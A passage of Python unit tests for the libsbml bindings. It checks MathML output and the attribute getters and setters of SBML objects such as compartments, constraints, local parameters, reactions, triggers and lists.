self.equals(expected,self.S) ) pass def test_MathMLFormatter_plus_nary_2(self): expected = wrapMathML(" <apply>\n" + " <plus/>\n" + " <cn type=\"integer\"> 1 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " <cn type=\"integer\"> 3 </cn>\n" + " </apply>\n") self.N = libsbml.parseFormula("(1 + 2) + 3") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_plus_nary_3(self): expected = wrapMathML(" <apply>\n" + " <plus/>\n" + " <cn type=\"integer\"> 1 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " <cn type=\"integer\"> 3 </cn>\n" + " </apply>\n") self.N = libsbml.parseFormula("1 + (2 + 3)") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_plus_nary_4(self): expected = wrapMathML(" <apply>\n" + " <plus/>\n" + " <cn type=\"integer\"> 1 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " <apply>\n" + " <times/>\n" + " <ci> x </ci>\n" + " <ci> y </ci>\n" + " <ci> z </ci>\n" + " </apply>\n" + " <cn type=\"integer\"> 3 </cn>\n" + " </apply>\n") self.N = libsbml.parseFormula("1 + 2 + x * y * z + 3") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_root(self): expected = wrapMathML(" <apply>\n" + " <root/>\n" + " <degree>\n" + " <cn type=\"integer\"> 3 </cn>\n" + " </degree>\n" + " <ci> x </ci>\n" + " </apply>\n") self.N = libsbml.parseFormula("root(3, x)") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_sin(self): expected = wrapMathML(" <apply>\n" + " <sin/>\n" + " <ci> x </ci>\n" + " </apply>\n") self.N = libsbml.parseFormula("sin(x)") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestWriteMathML)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestCompartment.py ```python import sys import unittest import libsbml class TestCompartment(unittest.TestCase): global C C = None def setUp(self): self.C = libsbml.Compartment(2,4) if (self.C == None): pass pass def tearDown(self): _dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList pass def test_Compartment_create(self): self.assert_( self.C.getTypeCode() == libsbml.SBML_COMPARTMENT ) self.assert_( self.C.getMetaId() == "" ) self.assert_( self.C.getNotes() == None ) self.assert_( self.C.getAnnotation() == None ) self.assert_( self.C.getId() == "" ) self.assert_( self.C.getName() == "" ) self.assert_( self.C.getUnits() == "" ) self.assert_( self.C.getOutside() == "" ) self.assert_( self.C.getSpatialDimensions() == 3 ) self.assert_( self.C.getVolume() == 1.0 ) self.assert_( self.C.getConstant() == True ) self.assertEqual( False, self.C.isSetId() ) self.assertEqual( False, self.C.isSetName() ) self.assertEqual( False, self.C.isSetSize() ) self.assertEqual( False, self.C.isSetVolume() ) self.assertEqual( False, self.C.isSetUnits() ) self.assertEqual( False, self.C.isSetOutside() ) pass def test_Compartment_createWith(self): c = libsbml.Compartment(2,4) c.setId( "A") self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT ) self.assert_( c.getMetaId() == "" ) self.assert_( c.getNotes() == None ) self.assert_( c.getAnnotation() == None ) self.assert_( c.getName() == "" ) self.assert_( c.getSpatialDimensions() == 3 ) self.assert_(( "A" == c.getId() )) self.assert_( c.getConstant() == True ) self.assertEqual( True, c.isSetId() ) self.assertEqual( False, c.isSetName() ) _dummyList = [ c ]; _dummyList[:] = []; del _dummyList pass def test_Compartment_createWithNS(self): xmlns = libsbml.XMLNamespaces() xmlns.add( "http://www.sbml.org", "testsbml") sbmlns = libsbml.SBMLNamespaces(2,1) sbmlns.addNamespaces(xmlns) c = libsbml.Compartment(sbmlns) self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT ) self.assert_( c.getMetaId() == "" ) self.assert_( c.getNotes() == None ) self.assert_( c.getAnnotation() == None ) self.assert_( c.getLevel() == 2 ) self.assert_( c.getVersion() == 1 ) self.assert_( c.getNamespaces() != None ) self.assert_( c.getNamespaces().getLength() == 2 ) self.assert_( c.getName() == "" ) self.assert_( c.getSpatialDimensions() == 3 ) self.assert_( c.getConstant() == True ) _dummyList = [ c ]; _dummyList[:] = []; del _dummyList pass def test_Compartment_free_NULL(self): _dummyList = [ None ]; _dummyList[:] = []; del _dummyList pass def test_Compartment_getSpatialDimensions(self): self.C.setSpatialDimensions(1) self.assert_( self.C.getSpatialDimensions() == 1 ) pass def test_Compartment_getsetConstant(self): self.C.setConstant(True) self.assert_( self.C.getConstant() == True ) pass def test_Compartment_getsetType(self): self.C.setCompartmentType( "cell") self.assert_(( "cell" == self.C.getCompartmentType() )) self.assertEqual( True, self.C.isSetCompartmentType() ) self.C.unsetCompartmentType() self.assertEqual( False, self.C.isSetCompartmentType() ) pass def test_Compartment_initDefaults(self): c = libsbml.Compartment(2,4) c.setId( "A") c.initDefaults() self.assert_(( "A" == c.getId() )) self.assert_( c.getName() == "" ) self.assert_( c.getUnits() == "" ) self.assert_( c.getOutside() == "" ) self.assert_( c.getSpatialDimensions() == 3 ) self.assert_( c.getVolume() == 1.0 ) self.assert_( c.getConstant() == True ) self.assertEqual( True, c.isSetId() ) self.assertEqual( False, c.isSetName() ) self.assertEqual( False, c.isSetSize() ) self.assertEqual( False, c.isSetVolume() ) self.assertEqual( False, c.isSetUnits() ) self.assertEqual( False, c.isSetOutside() ) self.assertEqual( True, c.isSetSpatialDimensions() ) self.assertEqual( True, c.isSetConstant() ) _dummyList = [ c ]; _dummyList[:] = []; del _dummyList pass def test_Compartment_setId(self): id = "mitochondria"; self.C.setId(id) self.assert_(( id == self.C.getId() )) self.assertEqual( True, self.C.isSetId() ) if (self.C.getId() == id): pass self.C.setId(self.C.getId()) self.assert_(( id == self.C.getId() )) self.C.setId("") self.assertEqual( False, self.C.isSetId() ) if (self.C.getId() != None): pass pass def test_Compartment_setName(self): name = "My_Favorite_Factory"; self.C.setName(name) self.assert_(( name == self.C.getName() )) self.assertEqual( True, self.C.isSetName() ) if (self.C.getName() == name): pass self.C.setName(self.C.getName()) self.assert_(( name == self.C.getName() )) self.C.setName("") self.assertEqual( False, self.C.isSetName() ) if (self.C.getName() != None): pass pass def test_Compartment_setOutside(self): outside = "cell"; self.C.setOutside(outside) self.assert_(( outside == self.C.getOutside() )) self.assertEqual( True, self.C.isSetOutside() ) if (self.C.getOutside() == outside): pass self.C.setOutside(self.C.getOutside()) self.assert_(( outside == self.C.getOutside() )) self.C.setOutside("") self.assertEqual( False, self.C.isSetOutside() ) if (self.C.getOutside() != None): pass pass def test_Compartment_setUnits(self): units = "volume"; self.C.setUnits(units) self.assert_(( units == self.C.getUnits() )) self.assertEqual( True, self.C.isSetUnits() ) if (self.C.getUnits() == units): pass self.C.setUnits(self.C.getUnits()) self.assert_(( units == self.C.getUnits() )) self.C.setUnits("") self.assertEqual( False, self.C.isSetUnits() ) if (self.C.getUnits() != None): pass pass def test_Compartment_unsetSize(self): self.C.setSize(0.2) self.assert_( self.C.getSize() == 0.2 ) self.assertEqual( True, self.C.isSetSize() ) self.C.unsetSize() self.assertEqual( False, self.C.isSetSize() ) pass def test_Compartment_unsetVolume(self): self.C.setVolume(1.0) self.assert_( self.C.getVolume() == 1.0 ) self.C.unsetVolume() self.assertEqual( False, self.C.isSetVolume() ) pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestCompartment)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestConstraint.py ```python import sys import unittest import libsbml class TestConstraint(unittest.TestCase): global C C = None def setUp(self): self.C = libsbml.Constraint(2,4) if (self.C == None): pass pass def tearDown(self): _dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList pass def test_Constraint_create(self): self.assert_( self.C.getTypeCode() == libsbml.SBML_CONSTRAINT ) self.assert_( self.C.getMetaId() == "" ) self.assert_( self.C.getNotes() == None ) self.assert_( self.C.getAnnotation() == None ) self.assertEqual( False, self.C.isSetMessage() ) self.assertEqual( False, self.C.isSetMath() ) pass def test_Constraint_createWithNS(self): xmlns = libsbml.XMLNamespaces() xmlns.add( "http://www.sbml.org", "testsbml") sbmlns = libsbml.SBMLNamespaces(2,2) sbmlns.addNamespaces(xmlns) object = libsbml.Constraint(sbmlns) self.assert_( object.getTypeCode() == libsbml.SBML_CONSTRAINT ) self.assert_( object.getMetaId() == "" ) self.assert_( object.getNotes() == None ) self.assert_( object.getAnnotation() == None ) self.assert_( object.getLevel() == 2 ) self.assert_( object.getVersion() == 2 ) self.assert_( object.getNamespaces() != None ) self.assert_( object.getNamespaces().getLength() == 2 ) _dummyList = [ object ]; _dummyList[:] = []; del _dummyList pass def test_Constraint_free_NULL(self): _dummyList = [ None ]; _dummyList[:] = []; del _dummyList pass def test_Constraint_setMath(self): math = libsbml.parseFormula("2 * k") self.C.setMath(math) self.assert_( self.C.getMath() != math ) self.assertEqual( True, self.C.isSetMath() ) self.C.setMath(self.C.getMath()) self.assert_( self.C.getMath() != math ) self.C.setMath(None) self.assertEqual( False, self.C.isSetMath() ) if (self.C.getMath() != None): pass _dummyList = [ math ]; _dummyList[:] = []; del _dummyList pass def test_Constraint_setMessage(self): text = libsbml.XMLNode.convertStringToXMLNode(" Some text ",None) triple = libsbml.XMLTriple("p", "http://www.w3.org/1999/xhtml", "") att = libsbml.XMLAttributes() xmlns = libsbml.XMLNamespaces() xmlns.add( "http://www.w3.org/1999/xhtml", "") p = libsbml.XMLNode(triple,att,xmlns) p.addChild(text) triple1 = libsbml.XMLTriple("message", "", "") att1 = libsbml.XMLAttributes() node = libsbml.XMLNode(triple1,att1) node.addChild(p) self.C.setMessage(node) self.assert_( self.C.getMessage() != node ) self.assert_( self.C.isSetMessage() == True ) self.C.setMessage(self.C.getMessage()) self.assert_( self.C.getMessage() != node ) self.assert_( self.C.getMessageString() != None ) self.C.unsetMessage() self.assertEqual( False, self.C.isSetMessage() ) if (self.C.getMessage() != None): pass _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestConstraint)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestL3Compartment.py ```python import sys import unittest import libsbml def isnan(x): return (x != x) pass class TestL3Compartment(unittest.TestCase): global C C = None def setUp(self): self.C = libsbml.Compartment(3,1) if (self.C == None): pass pass def tearDown(self): _dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList pass def test_L3_Compartment_NS(self): self.assert_( self.C.getNamespaces() != None ) self.assert_( self.C.getNamespaces().getLength() == 1 ) self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.C.getNamespaces().getURI(0) )) pass def test_L3_Compartment_constant(self): self.assert_( self.C.isSetConstant() == False ) self.C.setConstant(True) self.assert_( self.C.getConstant() == True ) self.assert_( self.C.isSetConstant() == True ) self.C.setConstant(False) self.assert_( self.C.getConstant() == False ) self.assert_( self.C.isSetConstant() == True ) pass def test_L3_Compartment_create(self): self.assert_( self.C.getTypeCode() == libsbml.SBML_COMPARTMENT ) self.assert_( self.C.getMetaId() == "" ) self.assert_( self.C.getNotes() == None ) self.assert_( self.C.getAnnotation() == None ) self.assert_( self.C.getId() == "" ) self.assert_( self.C.getName() == "" ) self.assert_( self.C.getUnits() == "" ) self.assert_( self.C.getOutside() == "" ) self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) ) self.assertEqual( True, isnan(self.C.getVolume()) ) self.assert_( self.C.getConstant() == True ) self.assertEqual( False, self.C.isSetId() ) self.assertEqual( False, self.C.isSetSpatialDimensions() ) self.assertEqual( False, self.C.isSetName() ) self.assertEqual( False, self.C.isSetSize() ) self.assertEqual( False, self.C.isSetVolume() ) self.assertEqual( False, self.C.isSetUnits() ) self.assertEqual( False, self.C.isSetOutside() ) self.assertEqual( False, self.C.isSetConstant() ) pass def test_L3_Compartment_createWithNS(self): xmlns = libsbml.XMLNamespaces() xmlns.add( "http://www.sbml.org", "testsbml") sbmlns = libsbml.SBMLNamespaces(3,1) sbmlns.addNamespaces(xmlns) c = libsbml.Compartment(sbmlns) self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT ) self.assert_( c.getMetaId() == "" ) self.assert_( c.getNotes() == None ) self.assert_( c.getAnnotation() == None ) self.assert_( c.getLevel() == 3 ) self.assert_( c.getVersion() == 1 ) self.assert_( c.getNamespaces() != None ) self.assert_( c.getNamespaces().getLength() == 2 ) self.assert_( c.getId() == "" ) self.assert_( c.getName() == "" ) self.assert_( c.getUnits() == "" ) self.assert_( c.getOutside() == "" ) self.assertEqual( True, isnan(c.getSpatialDimensionsAsDouble()) ) self.assertEqual( True, isnan(c.getVolume()) ) self.assert_( c.getConstant() == True ) self.assertEqual( False, c.isSetId() ) self.assertEqual( False, c.isSetSpatialDimensions() ) self.assertEqual( False, c.isSetName() ) self.assertEqual( False, c.isSetSize() ) self.assertEqual( False, c.isSetVolume() ) self.assertEqual( False, c.isSetUnits() ) self.assertEqual( False, c.isSetOutside() ) self.assertEqual( False, c.isSetConstant() ) _dummyList = [ c ]; _dummyList[:] = []; del _dummyList pass def test_L3_Compartment_free_NULL(self): _dummyList = [ None ]; _dummyList[:] = []; del _dummyList pass def test_L3_Compartment_hasRequiredAttributes(self): c = libsbml.Compartment(3,1) self.assertEqual( False, c.hasRequiredAttributes() ) c.setId( "id") self.assertEqual( False, c.hasRequiredAttributes() ) c.setConstant(False) self.assertEqual( True, c.hasRequiredAttributes() ) _dummyList = [ c ]; _dummyList[:] = []; del _dummyList pass def test_L3_Compartment_id(self): id = "mitochondria"; self.assertEqual( False, self.C.isSetId() ) self.C.setId(id) self.assert_(( id == self.C.getId() )) self.assertEqual( True, self.C.isSetId() ) if (self.C.getId() == id): pass pass def test_L3_Compartment_initDefaults(self): c = libsbml.Compartment(3,1) c.setId( "A") self.assertEqual( True, c.isSetId() ) self.assertEqual( False, c.isSetName() ) self.assertEqual( False, c.isSetSize() ) self.assertEqual( False, c.isSetVolume() ) self.assertEqual( False, c.isSetUnits() ) self.assertEqual( False, c.isSetConstant() ) self.assertEqual( False, c.isSetSpatialDimensions() ) c.initDefaults() self.assert_(( "A" == c.getId() )) self.assert_( c.getName() == "" ) self.assert_(( "litre" == c.getUnits() )) self.assert_( c.getSpatialDimensions() == 3 ) self.assert_( c.getSize() == 1 ) self.assert_( c.getConstant() == True ) self.assertEqual( True, c.isSetId() ) self.assertEqual( False, c.isSetName() ) self.assertEqual( False, c.isSetSize() ) self.assertEqual( False, c.isSetVolume() ) self.assertEqual( True, c.isSetUnits() ) self.assertEqual( True, c.isSetConstant() ) self.assertEqual( True, c.isSetSpatialDimensions() ) _dummyList = [ c ]; _dummyList[:] = []; del _dummyList pass def test_L3_Compartment_name(self): name = "My_Favorite_Factory"; self.assertEqual( False, self.C.isSetName() ) self.C.setName(name) self.assert_(( name == self.C.getName() )) self.assertEqual( True, self.C.isSetName() ) if (self.C.getName() == name): pass self.C.unsetName() self.assertEqual( False, self.C.isSetName() ) if (self.C.getName() != None): pass pass def test_L3_Compartment_size(self): size = 0.2 self.assertEqual( False, self.C.isSetSize() ) self.assertEqual( True, isnan(self.C.getSize()) ) self.C.setSize(size) self.assert_( self.C.getSize() == size ) self.assertEqual( True, self.C.isSetSize() ) self.C.unsetSize() self.assertEqual( False, self.C.isSetSize() ) self.assertEqual( True, isnan(self.C.getSize()) ) pass def test_L3_Compartment_spatialDimensions(self): self.assertEqual( False, self.C.isSetSpatialDimensions() ) self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) ) self.C.setSpatialDimensions(1.5) self.assertEqual( True, self.C.isSetSpatialDimensions() ) self.assert_( self.C.getSpatialDimensionsAsDouble() == 1.5 ) self.C.unsetSpatialDimensions() self.assertEqual( False, self.C.isSetSpatialDimensions() ) self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) ) pass def test_L3_Compartment_units(self): units = "volume"; self.assertEqual( False, self.C.isSetUnits() ) self.C.setUnits(units) self.assert_(( units == self.C.getUnits() )) self.assertEqual( True, self.C.isSetUnits() ) if (self.C.getUnits() == units): pass self.C.unsetUnits() self.assertEqual( False, self.C.isSetUnits() ) if (self.C.getUnits() != None): pass pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestL3Compartment)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestL3LocalParameter.py ```python import sys import unittest import libsbml def isnan(x): return (x != x) pass class TestL3LocalParameter(unittest.TestCase): global P P = None def setUp(self): self.P = libsbml.LocalParameter(3,1) if (self.P == None): pass pass def tearDown(self): _dummyList = [ self.P ]; _dummyList[:] = []; del _dummyList pass def test_L3_LocalParameter_NS(self): self.assert_( self.P.getNamespaces() != None ) self.assert_( self.P.getNamespaces().getLength() == 1 ) self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.P.getNamespaces().getURI(0) )) pass def test_L3_LocalParameter_create(self): self.assert_( self.P.getTypeCode() == libsbml.SBML_LOCAL_PARAMETER ) self.assert_( self.P.getMetaId() == "" ) self.assert_( self.P.getNotes() == None ) self.assert_( self.P.getAnnotation() == None ) self.assert_( self.P.getId() == "" ) self.assert_( self.P.getName() == "" ) self.assert_( self.P.getUnits() == "" ) self.assertEqual( True, isnan(self.P.getValue()) ) self.assertEqual( False, self.P.isSetId() ) self.assertEqual( False, self.P.isSetName() ) self.assertEqual( False, self.P.isSetValue() ) self.assertEqual( False, self.P.isSetUnits() ) pass def test_L3_LocalParameter_createWithNS(self): xmlns = libsbml.XMLNamespaces() xmlns.add( "http://www.sbml.org", "testsbml") sbmlns = libsbml.SBMLNamespaces(3,1) sbmlns.addNamespaces(xmlns) p = libsbml.LocalParameter(sbmlns) self.assert_( p.getTypeCode() == libsbml.SBML_LOCAL_PARAMETER ) self.assert_( p.getMetaId() == "" ) self.assert_( p.getNotes() == None ) self.assert_( p.getAnnotation() == None ) self.assert_( p.getLevel() == 3 ) self.assert_( p.getVersion() == 1 ) self.assert_( p.getNamespaces() != None ) self.assert_( p.getNamespaces().getLength() == 2 ) self.assert_( p.getId() == "" ) self.assert_( p.getName() == "" ) self.assert_( p.getUnits() == "" ) self.assertEqual( True, isnan(p.getValue()) ) self.assertEqual( False, p.isSetId() ) self.assertEqual( False, p.isSetName() ) self.assertEqual( False, p.isSetValue() ) self.assertEqual( False, p.isSetUnits() ) _dummyList = [ p ]; _dummyList[:] = []; del _dummyList pass def test_L3_LocalParameter_free_NULL(self): _dummyList = [ None ]; _dummyList[:] = []; del _dummyList pass def test_L3_LocalParameter_hasRequiredAttributes(self): p = libsbml.LocalParameter(3,1) self.assertEqual( False, p.hasRequiredAttributes() ) p.setId( "id") self.assertEqual( True, p.hasRequiredAttributes() ) _dummyList = [ p ]; _dummyList[:] = []; del _dummyList pass def test_L3_LocalParameter_id(self): id = "mitochondria"; self.assertEqual( False, self.P.isSetId() ) self.P.setId(id) self.assert_(( id == self.P.getId() )) self.assertEqual( True, self.P.isSetId() ) if (self.P.getId() == id): pass pass def test_L3_LocalParameter_name(self): name = "My_Favorite_Factory"; self.assertEqual( False, self.P.isSetName() ) self.P.setName(name) self.assert_(( name == self.P.getName() )) self.assertEqual( True, self.P.isSetName() ) if (self.P.getName() == name): pass self.P.unsetName() self.assertEqual( False, self.P.isSetName() ) if (self.P.getName() != None): pass pass def test_L3_LocalParameter_units(self): units = "volume"; self.assertEqual( False, self.P.isSetUnits() ) self.P.setUnits(units) self.assert_(( units == self.P.getUnits() )) self.assertEqual( True, self.P.isSetUnits() ) if (self.P.getUnits() == units): pass self.P.unsetUnits() self.assertEqual( False, self.P.isSetUnits() ) if (self.P.getUnits() != None): pass pass def test_L3_LocalParameter_value(self): self.assertEqual( False, self.P.isSetValue() ) self.assertEqual( True, isnan(self.P.getValue()) ) self.P.setValue(1.5) self.assertEqual( True, self.P.isSetValue() ) self.assert_( self.P.getValue() == 1.5 ) self.P.unsetValue() self.assertEqual( False, self.P.isSetValue() ) self.assertEqual( True, isnan(self.P.getValue()) ) pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestL3LocalParameter)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestL3Reaction.py ```python import sys import unittest import libsbml class TestL3Reaction(unittest.TestCase): global R R = None def setUp(self): self.R = libsbml.Reaction(3,1) if (self.R == None): pass pass def tearDown(self): _dummyList = [ self.R ]; _dummyList[:] = []; del _dummyList pass def test_L3_Reaction_NS(self): self.assert_( self.R.getNamespaces() != None ) self.assert_( self.R.getNamespaces().getLength() == 1 ) self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.R.getNamespaces().getURI(0) )) pass def test_L3_Reaction_compartment(self): compartment = "cell"; self.assertEqual( False, self.R.isSetCompartment() ) self.R.setCompartment(compartment) self.assert_(( compartment == self.R.getCompartment() )) self.assertEqual( True, self.R.isSetCompartment() ) if (self.R.getCompartment() == compartment): pass self.R.unsetCompartment() self.assertEqual( False, self.R.isSetCompartment() ) if (self.R.getCompartment() != None): pass pass def test_L3_Reaction_create(self): self.assert_( self.R.getTypeCode() == libsbml.SBML_REACTION ) self.assert_( self.R.getMetaId() == "" ) self.assert_( self.R.getNotes() == None ) self.assert_( self.R.getAnnotation() == None ) self.assert_( self.R.getId() == "" ) self.assert_( self.R.getName() == "" ) self.assert_( self.R.getCompartment() == "" ) self.assert_( self.R.getFast() == False ) self.assert_( self.R.getReversible() == True ) self.assertEqual( False, self.R.isSetId() ) self.assertEqual( False, self.R.isSetName() ) self.assertEqual( False, self.R.isSetCompartment() ) self.assertEqual( False, self.R.isSetFast() ) self.assertEqual( False, self.R.isSetReversible() ) pass def test_L3_Reaction_createWithNS(self): xmlns = libsbml.XMLNamespaces() xmlns.add( "http://www.sbml.org", "testsbml") sbmlns = libsbml.SBMLNamespaces(3,1) sbmlns.addNamespaces(xmlns) r = libsbml.Reaction(sbmlns) self.assert_( r.getTypeCode() == libsbml.SBML_REACTION ) self.assert_( r.getMetaId() == "" ) self.assert_( r.getNotes() == None ) self.assert_( r.getAnnotation() == None ) self.assert_( r.getLevel() == 3 ) self.assert_( r.getVersion() == 1 ) self.assert_( r.getNamespaces() != None ) self.assert_( r.getNamespaces().getLength() == 2 ) self.assert_( r.getId() == "" ) self.assert_( r.getName() == "" ) self.assert_( r.getCompartment() == "" ) self.assert_( r.getFast() == False ) self.assert_( r.getReversible() == True ) self.assertEqual( False, r.isSetId() ) self.assertEqual( False, r.isSetName() ) self.assertEqual( False, r.isSetCompartment() ) self.assertEqual( False, r.isSetFast() ) self.assertEqual( False, r.isSetReversible() ) _dummyList = [ r ]; _dummyList[:] = []; del _dummyList pass def test_L3_Reaction_fast(self): self.assert_( self.R.isSetFast() == False ) self.R.setFast(True) self.assert_( self.R.getFast() == True ) self.assert_( self.R.isSetFast() == True ) self.R.setFast(False) self.assert_( self.R.getFast() == False ) self.assert_( self.R.isSetFast() == True ) pass def test_L3_Reaction_free_NULL(self): _dummyList = [ None ]; _dummyList[:] = []; del _dummyList pass def test_L3_Reaction_hasRequiredAttributes(self): r = libsbml.Reaction(3,1) self.assertEqual( False, r.hasRequiredAttributes() ) r.setId( "id") self.assertEqual( False, r.hasRequiredAttributes() ) r.setFast(False) self.assertEqual( False, r.hasRequiredAttributes() ) r.setReversible(False) self.assertEqual( True, r.hasRequiredAttributes() ) _dummyList = [ r ]; _dummyList[:] = []; del _dummyList pass def test_L3_Reaction_id(self): id = "mitochondria"; self.assertEqual( False, self.R.isSetId() ) self.R.setId(id) self.assert_(( id == self.R.getId() )) self.assertEqual( True, self.R.isSetId() ) if (self.R.getId() == id): pass pass def test_L3_Reaction_name(self): name = "My_Favorite_Factory"; self.assertEqual( False, self.R.isSetName() ) self.R.setName(name) self.assert_(( name == self.R.getName() )) self.assertEqual( True, self.R.isSetName() ) if (self.R.getName() == name): pass self.R.unsetName() self.assertEqual( False, self.R.isSetName() ) if (self.R.getName() != None): pass pass def test_L3_Reaction_reversible(self): self.assert_( self.R.isSetReversible() == False ) self.R.setReversible(True) self.assert_( self.R.getReversible() == True ) self.assert_( self.R.isSetReversible() == True ) self.R.setReversible(False) self.assert_( self.R.getReversible() == False ) self.assert_( self.R.isSetReversible() == True ) pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestL3Reaction)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestL3Trigger.py ```python import sys import unittest import libsbml class TestL3Trigger(unittest.TestCase): global T T = None def setUp(self): self.T = libsbml.Trigger(3,1) if (self.T == None): pass pass def tearDown(self): _dummyList = [ self.T ]; _dummyList[:] = []; del _dummyList pass def test_L3Trigger_create(self): self.assert_( self.T.getTypeCode() == libsbml.SBML_TRIGGER ) self.assert_( self.T.getMetaId() == "" ) self.assert_( self.T.getNotes() == None ) self.assert_( self.T.getAnnotation() == None ) self.assert_( self.T.getMath() == None ) self.assert_( self.T.getInitialValue() == 1 ) self.assert_( self.T.getPersistent() == 1 ) self.assert_( self.T.isSetInitialValue() == 0 ) self.assert_( self.T.isSetPersistent() == 0 ) pass def test_L3Trigger_setInitialValue(self): i = self.T.setInitialValue(0) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( self.T.getInitialValue() == 0 ) self.assert_( self.T.isSetInitialValue() == 1 ) i = self.T.setInitialValue(1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( self.T.getInitialValue() == 1 ) self.assert_( self.T.isSetInitialValue() == 1 ) pass def test_L3Trigger_setInitialValue1(self): t = libsbml.Trigger(2,4) i = t.setInitialValue(0) self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE ) self.assert_( self.T.getInitialValue() == 1 ) self.assert_( self.T.isSetInitialValue() == 0 ) _dummyList = [ t ]; _dummyList[:] = []; del _dummyList pass def test_L3Trigger_setPersistent(self): i = self.T.setPersistent(0) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( self.T.getPersistent() == 0 ) self.assert_( self.T.isSetPersistent() == 1 ) i = self.T.setPersistent(1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( self.T.getPersistent() == 1 ) self.assert_( self.T.isSetPersistent() == 1 ) pass def test_L3Trigger_setPersistent1(self): t = libsbml.Trigger(2,4) i = t.setPersistent(0) self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE ) self.assert_( self.T.getPersistent() == 1 ) self.assert_( self.T.isSetPersistent() == 0 ) _dummyList = [ t ]; _dummyList[:] = []; del _dummyList pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestL3Trigger)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestListOf.py ```python import sys import unittest import libsbml class TestListOf(unittest.TestCase): def test_ListOf_append(self): m = libsbml.Model(2,4) m.createCompartment() loc = m.getListOfCompartments() self.assert_( loc.size() == 1 ) c = libsbml.Compartment(2,4) i = loc.append(c) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( loc.size() == 2 ) sp = libsbml.Species(2,4) i = loc.append(sp) self.assert_( i == libsbml.LIBSBML_INVALID_OBJECT ) self.assert_( loc.size() == 2 ) _dummyList = [ m ]; _dummyList[:] = []; del _dummyList _dummyList = [ sp ]; _dummyList[:] = []; del _dummyList pass def test_ListOf_clear(self): lo = libsbml.ListOf(2,4) sp = libsbml.Species(2,4) lo.append(sp) lo.append(sp) lo.append(sp) lo.append(sp) lo.append(sp) self.assert_( lo.size() == 5 ) lo.clear(True) self.assert_( lo.size() == 0 ) lo.append(sp) lo.append(sp) lo.append(sp) lo.append(sp) lo.appendAndOwn(sp) self.assert_( lo.size() == 5 ) elem = lo.get(0) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList elem = lo.get(1) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList elem = lo.get(2) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList elem = lo.get(3) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList elem = lo.get(4) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList lo.clear(False) self.assert_( lo.size() == 0 ) _dummyList = [ lo ]; _dummyList[:] = []; del _dummyList pass def test_ListOf_create(self): lo = libsbml.ListOf(2,4) self.assert_( lo.getTypeCode() == libsbml.SBML_LIST_OF ) self.assert_( lo.getNotes() == None ) self.assert_( lo.getAnnotation() == None ) self.assert_( lo.getMetaId() == "" ) self.assert_( lo.size() == 0 ) _dummyList = [ lo ]; _dummyList[:] = []; del _dummyList pass def test_ListOf_free_NULL(self): _dummyList = [ None ]; _dummyList[:] = []; del _dummyList pass def test_ListOf_remove(self): lo = libsbml.ListOf(2,4) sp = libsbml.Species(2,4) self.assert_( lo.size() == 0 ) lo.append(sp) 